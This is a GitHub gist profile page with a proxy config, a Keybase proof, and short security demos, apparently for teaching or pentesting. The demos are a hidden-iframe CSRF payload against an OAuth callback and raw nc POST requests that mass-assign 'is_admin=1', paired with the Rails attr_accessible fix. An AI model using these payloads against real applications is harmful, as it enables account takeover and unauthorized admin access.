Skip to content

Instantly share code, notes, and snippets.

Avatar

Michiel Prins michiel3

View GitHub Profile
@michiel3
michiel3 / h1.pac
Last active Aug 30, 2018 — forked from RSO/h1.pac
View h1.pac
function FindProxyForURL(url, host) {
var site_list = [
"localhost",
"127.0.0.1",
"ci.inverselink.com",
"payments-production.inverselink.com"
];
if (site_list.includes(host)) {
return "SOCKS5 127.0.0.1:8888";
View keybase.md

Keybase proof

I hereby claim:

  • I am michiel3 on github.
  • I am michiel (https://keybase.io/michiel) on keybase.
  • I have a public key whose fingerprint is 7CAA CE4D A70C 4C8A FE94 A75C 9F46 3C34 FAA0 2F3D

To claim this, I am signing this object:

@michiel3
michiel3 / csrf-oauth.html
Created Jul 5, 2012
CSRF OAuth vulnerability
View csrf-oauth.html
<iframe src="https://vulnerableapp.com/auth/facebook?code=dGhpcyBpcyBub3QgbXkgcGFzc3dvcmQh..."
style="display:none;"></iframe>
@michiel3
michiel3 / massassignmentenabled.rb
Created Mar 6, 2012
Mass assignment protection enabled
View massassignmentenabled.rb
1.8.7-p352 :022 > User.create(:username => "michiel", :password => "password", :email => "info@online24.nl", :is_admin => 1)
ActiveModel::MassAssignmentSecurity::Error: Can't mass-assign protected attributes: is_admin
@michiel3
michiel3 / is_admin
Created Mar 6, 2012
Create user object with is_admin=1
View is_admin
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 93
user[username]=michiel&user[password]=password&user[email]=info@online24.nl&user[is_admin]=1
@michiel3
michiel3 / create_user
Created Mar 6, 2012
Create user object
View create_user
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 76
user[username]=michiel&user[password]=password&user[email]=info@online24.nl
@michiel3
michiel3 / scheme.rb
Created Mar 6, 2012
Mass assignment example scheme
View scheme.rb
ActiveRecord::Schema.define(:version => 20120306115211) do
create_table "users", :force => true do |t|
t.string "username"
t.string "password"
t.string "email"
t.boolean "is_admin"
end
end
@michiel3
michiel3 / user.rb
Created Mar 6, 2012
Mass assignment protection
View user.rb
class User < ActiveRecord::Base
attr_accessible :username, :password, :email
end
You can’t perform that action at this time.